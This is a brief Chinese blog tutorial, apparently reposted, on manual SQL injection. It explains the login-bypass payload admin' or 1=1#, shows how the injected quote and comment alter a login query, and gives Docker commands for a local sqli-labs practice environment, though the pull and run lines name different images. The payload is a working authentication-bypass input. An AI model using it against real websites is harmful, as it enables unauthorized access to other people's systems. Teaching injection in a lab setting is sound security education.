标签:万能密码 网站 sel name 登录 后台 运维 mic 输入
为什么要学习手工注入?工具:sqlmap
万能密码,直接登录到后台页面,不需要密码:admin‘ or 1=1#,当后台存在注入的话,才能使用注入密码,不是所有的网站进行登录。
当输入admin,admin,在后台的SQL语句是:
select * from user where username=‘$user‘ and password=‘pass‘;
提交的代码时,语句是:
select * from user where username=‘admin‘ or 1=1#‘ and password=‘pass‘;
输入单引号是将前面的SQL语句,进行闭合,后面的#会将后面的语句注释掉,进行查询是,1=1,是永正的语句,所以在有漏掉的前提下,可以不用密码,就可登陆。
本地搭建(docker):
docker pull c0ny1/sqli-labs
docker run -dt --name sqli-lab -p 8003:80 acgpiano/sqli-labs:latest
标签:万能密码 网站 sel name 登录 后台 运维 mic 输入
原文地址:https://blog.51cto.com/13451715/2391340